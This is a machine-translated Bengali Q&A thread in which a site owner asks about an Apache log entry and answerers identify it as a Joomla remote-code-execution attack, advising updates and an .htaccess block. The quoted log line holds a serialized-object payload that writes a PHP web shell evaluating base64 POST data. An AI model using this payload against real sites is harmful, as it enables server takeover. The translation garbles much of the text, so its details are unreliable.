ব্যবহারকারীর এজেন্ট সনাক্তকরণ কোনও স্ক্রিপ্টিং আক্রমণ আক্রমণকারীর জন্য ব্যবহৃত হয়েছিল?


10

আমার সাইটে অ্যাপাচি অ্যাক্সেস লগ এন্ট্রি সাধারণত এই জাতীয়:

207.46.13.174 - - [31 / অক্টোবর / 2016: 10: 18: 55 +0100] "জিইটি / যোগাযোগ করুন HTTP / 1.1" 200 256 "-" "মজিলা / 5.0 (সামঞ্জস্যপূর্ণ; বিংবট / 2.0; + http: // www .be.com.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607

যাতে আপনি সেখানে ব্যবহারকারী-এজেন্ট ক্ষেত্রটি দেখতে পারেন। তবে আজ আমি ব্যবহারকারীর এজেন্ট ক্ষেত্রটি এর মতো ব্যবহার করতে পেলাম:

62.210.162.42 - - [31 / অক্টোবর / 2016: 11: 24: 19 +0100] "জিইটি / এইচটিটিপি / 1.1" 200 399 "-" "} __ পরীক্ষা | ও: 21:" জেডিটাবেসড্রাইভারমাইস্ক্লি ": 3: {এস: 2 : "এফসি"; হে: 17: "JSimplepieFactory": 0: {} গুলি: 21: "\ 0 \ 0 \ 0disconnectHandlers"; একটি: 1: {I: 0; একটি: 2: {I: 0; হে: 9: "SimplePie": 5: {গুলি: 8: "নির্বিষ"; হে: 20: "JDatabaseDriverMysql": 0: {} গুলি: 8: "FEED_URL"; s: 242: "file_put_contents ($: _ সার্ভার [" DOCUMENT_ROOT " ] .chr (47)। "sqlconfigbak.php", "| = | \ x3C" .chr (63)। "পিএইচপি \ এক্স 24 মমজজ = \ x24_POST ['জেড']; যদি (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST [ 'z0']); @ Eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); প্রস্থান;"; র: 19: " cache_name_function "; গুলি: 6:" জাহির "; গুলি: 5:" ক্যাশে "; খ: 1; র: 11:" cache_class "; হে: 20:"জেডিটাবেসড্রাইভার মাইএসকিএল ": 0: {}} আই: 1; এস: 4:" আরআইবি ";}} এস: 13:" \ 0 \ 0 \ 0 সংযোগ "; বি: 1;} ~ Ů" 0.304 বিপাইএসএস 10.10.36.125:104 0,304

এটি কি আক্রমণ ছিল? পরবর্তী লগ এন্ট্রি sqlconfigbak.phpস্ক্রিপ্টে উল্লিখিত ফাইলটি সফলভাবে পুনরুদ্ধার (কোড 200) পেয়েছে বলে মনে হচ্ছে । যদিও আমি ফাইল সিস্টেমে ফাইলটি খুঁজে পাই না:

62.210.162.42 - - [31 / অক্টোবর / 2016: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "মজিলা "

দয়া করে এখানে কি ঘটছিল?

উত্তর:


11

এটি একটি জুমলা 0 দিনের আক্রমণ। তথ্য এখানে পাওয়া যায়: https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

__তম সত্ত্বেও এটি কোনও দুর্বলতার পরীক্ষা নয়। এটি একটি আক্রমণ।

নিশ্চিত করুন যে কোনও জুমলা ইনস্টল যথাসম্ভব আপ টু ডেট রয়েছে।

অন্য বিকল্পটি হ'ল একটি সাধারণ স্ট্রিং সন্ধান করে এই শোষণকে বাধা দেওয়ার জন্য .htaccess ব্যবহার করা, "__est" কাজ করবে এবং অন্য কোনও জায়গায় পুনর্নির্দেশ করবে।


4

আপনি যে আইপি ঠিকানাটি যুক্ত করেছেন সেটি কোনও গুগল হোস্টনেমে সমাধান করে না তাই এটি Google নয় not দুর্বলতার জন্য ব্যক্তি বা বট আপনার সাইটটি স্ক্যান করছে। প্রথমটি একটি জুমলা দুর্বলতা সন্ধান করার চেষ্টা করছে।

এই ইভেন্টগুলি বেশিরভাগ ওয়েবসাইটে নিয়মিত ঘটনা, আপনার অবশ্যই নিশ্চিত হওয়া উচিত যে আপনি সেরা অনুশীলনগুলি অনুসরণ করছেন এবং আপনার ওয়েবসাইটকে শক্ত করে তুলছেন, প্রক্রিয়াটি দীর্ঘ এবং আপনার একটি অনলাইন টিউটোরিয়ালটি সন্ধান এবং অনুসরণ করতে হবে।


ঠিক আছে ধন্যবাদ. এটি সন্ধানের আগে আমি ইতিমধ্যে ওয়েবসাইটটিকে শক্ত করে তুলেছি। সত্যিই, এই জাতীয় আক্রমণকারী ভেক্টরটি খুঁজে পেয়ে আমাকে খানিকটা অবাক করেছিল।
মিরোক্লাভ

2

অন্যান্য উত্তরের পাশাপাশি, মনে রাখবেন যে এই আক্রমণটি স্পষ্টতই কাজ করেছিল তা বোঝায় যে আপনি পিএইচপি-র একটি পুরানো, সুরক্ষিত সংস্করণ চালাচ্ছেন। এই আক্রমণটি যে বাগটি ব্যবহার করে তার জন্য একটি স্থিরতা সেপ্টেম্বর ২০১৫ সালে প্রকাশিত হয়েছিল your এবং ইন্টারনেটের মুখোমুখি হওয়া অন্যান্য পুরানো প্রোগ্রামগুলিও পরীক্ষা করে দেখুন, কারণ মনে হচ্ছে আপনার সার্ভারটি কমপক্ষে এক বছরের জন্য আপ টু ডেট রাখেনি।


ধিক্কার!
ক্লোজটনোক
আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.